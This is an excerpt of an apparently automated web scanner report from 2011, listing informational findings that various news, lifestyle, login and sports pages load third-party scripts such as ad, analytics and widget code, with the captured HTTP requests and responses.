<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/d1e431bda25a167e695fb05acc6e0492371d9a89.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/lifeinc/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

23.140. http://lifestyle.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:11 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA08
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=95617ed8b1e0449b8e93c4352fb8c4ef; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=F82F814B9CA14A8DA8EF5EB7228D86A7; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:11 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 31456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="
...[SNIP]...
<div id="subfoot"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...

23.141. http://lifestyle.redacted/relationships/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /relationships/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /relationships/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:17 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA09
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ad185c8cd036476ab99f219f50cae67f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=4ACBAFEABC3E458D93445CB0BF71AA56; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:17 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 37451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...

23.142. http://lifestyle.redacted/relationships/staticslideshowglamour.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /relationships/staticslideshowglamour.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /relationships/staticslideshowglamour.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA13
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3a0a17b7e3454f56a4bcc12d1023d4df; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=02D6064FB59C4177880821E6DA25C485; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:19 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js"></script>
...[SNIP]...

23.143. http://lifestyle.redacted/your-home/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-home/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /your-home/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA10
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a62fddde6fef43f48d53312bf038943f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=DE365542A27E43F9A2D20EEC313CB20E; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:26 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...

23.144. http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-home/room-design/staticslideshowhb.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /your-home/room-design/staticslideshowhb.aspx?cp-documentid=26867784&gt1=32067 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:29 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA13
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=2d389eb7e7ea4ae0a473db58b1a5758b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=42164453E4924CB89C5B977561EA27D0; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 37466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div class="child c1 first"><script src="http://ads.hearstmags.com/ams/api.js?pos_name=AMS_MSN_HOST_HBU_585X368" type="text/javascript"></script>
...[SNIP]...
<div id="subfoot"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...

23.145. http://lifestyle.redacted/your-life/family-parenting/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-life/family-parenting/article.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /your-life/family-parenting/article.aspx?cp-documentid=27352384&gt1=32060 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:27 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA10
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=708c46c2de6a4adaa8f33981559353a2; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=151C902562754AB1AE9AA3C81E148BA9; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:27 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 44821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
</script><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js" xmlns="http://www.w3.org/1999/xhtml"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js"></script>
...[SNIP]...

23.146. http://lifestyle.redacted/your-life/your-money-today/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-life/your-money-today/article.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /your-life/your-money-today/article.aspx?cp-documentid=27387034&gt1=32078 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:25 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA16
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ea234a142c804af5831ec7272a1550e5; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=40EFBA27B80947FF988D1B47905AC12F; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:25 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 40186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d853029/10/859690/randm.js"></script>
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js"></script>
...[SNIP]...

23.147. http://lifestyle.redacted/your-life/your-money-today/video.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-life/your-money-today/video.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /your-life/your-money-today/video.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:22 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA14
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=90974142a1fa41e29c7695f2839c0b2b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=891F4DE87D9848CF80723C7BDFB3C47D; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:22 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 18282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d853029/10/859690/randm.js"></script>
...[SNIP]...

23.148. http://lifestyle.redacted/your-look/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-look/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /your-look/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:11 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA12
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=6dd6fe6121814e1988587a283896d37d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=1E75E2518F694A5EA1B2E04278A9FA88; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:11 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 36735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...

23.149. http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-look/makeup-skin-care-hair/staticslideshowessence.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /your-look/makeup-skin-care-hair/staticslideshowessence.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:14 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA10
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=e4b40a5c5380474087c7ce996b9332b8; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=D137C55805D5479EA6BDD999E5265BC4; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:13 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 48583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js"></script>
...[SNIP]...

23.150. http://lifestyle.redacted/your-look/video/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-look/video/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /your-look/video/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:21 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA14
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=2ca1bb8bab954b2e8916ae5a5e84634d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=A5D1B9B54E4F4F0A904965554C0FDE74; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:20 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 20440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...

23.151. http://live.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://live.newsvine.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: live.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:54:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Host,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=3261f137f4e2f6857b19efea70ec8e5e; expires=Sat, 25-Jan-2031 17:54:16 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 18471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvine&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.152. http://login.live.com/login.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.live.com
Path:   /login.srf

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296343067&co=1&id=265631; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:47:54 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H24 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:46:54 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296344874&id=N&co=1; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1$uuid-f2f145b9-7949-4a38-9839-b8a7726474e0; path=/;version=1
X-Frame-Options: deny
Content-Length: 11332

<!-- ServerInfo: BAYIDSLGN1H24 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
</script><script type="text/javascript" src="http://Js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js"></script>
<script type="text/javascript" src="http://Js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/WLWorkflow.js"></script>
...[SNIP]...

23.153. http://malsup.com/jquery/cycle/lite/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://malsup.com
Path:   /jquery/cycle/lite/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jquery/cycle/lite/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:23:45 GMT
Server: mod_security2/2.5.7
Last-Modified: Tue, 30 Mar 2010 03:07:07 GMT
ETag: "10ce04f-193b-482fbecbc2cc0"
Accept-Ranges: bytes
Content-Length: 6459
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Style-Typ
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.lite.1.0.min.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

23.154. http://michaelwann.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://michaelwann.newsvine.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: michaelwann.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:54:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=cff2e2c6340336c92750514520f8f6d5; expires=Sat, 25-Jan-2031 17:54:24 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.155. http://mlb.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mlb.scout.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: mlb.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:09:36 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:19:36 GMT
Last-Modified: Sat, 29 Jan 2011 23:57:57 GMT
ETag: "1CBC01059DF3080"
Content-Type: text/html
Content-Length: 27801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>MLB Team Directory Front Page</title>
<meta http-equiv="Con
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.156. http://money.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:10:09 GMT
